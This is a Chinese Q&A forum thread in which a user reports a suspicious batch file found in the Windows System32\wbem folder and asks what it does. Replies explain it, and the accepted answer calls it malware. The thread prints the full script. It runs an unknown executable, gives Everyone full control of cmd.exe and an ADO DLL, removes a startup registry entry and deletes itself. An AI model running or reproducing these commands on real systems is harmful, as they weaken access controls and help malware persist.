今天在我系统C:\Windows\System32\wbem发现一个12345批处理文件,内容如下
@echooffifexistC:\downs\runs.exestartC:\downs\runs.execopyc:\windows\system32\cacls.e...
@echo off
if exist C:\downs\runs.exe start C:\downs\runs.exe
copy c:\windows\system32\cacls.exe c:\windows\help\akpls.exe /y
cacls cmd.exe /e /g system:f
cacls cmd.exe /e /g everyone:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g everyone:f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BGClient /f
del c:\windows\system32\wbem\12345.bat
del %0 展开
if exist C:\downs\runs.exe start C:\downs\runs.exe
copy c:\windows\system32\cacls.exe c:\windows\help\akpls.exe /y
cacls cmd.exe /e /g system:f
cacls cmd.exe /e /g everyone:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g everyone:f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v BGClient /f
del c:\windows\system32\wbem\12345.bat
del %0 展开
展开全部
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
名片
2024-10-28 广告
Altair HyperWorks软件授权是优菁科技(上海)有限公司为客户提供的重要服务之一。我们确保每位客户都能合法、安全地使用HyperWorks这一先进的CAE(计算机辅助工程)平台。通过与Altair公司的紧密合作,我们为客户提供正...
点击进入详情页
本回答由名片提供
展开全部
如果C盘下的downs文件夹下存在runs.exe就执行
拷贝c:\windows\system32\cacls.exe c:\windows\help\akpls.exe
拷贝c:\windows\system32\cacls.exe c:\windows\help\akpls.exe
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
删除吧。这是一个恶意软件
本回答被提问者采纳
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
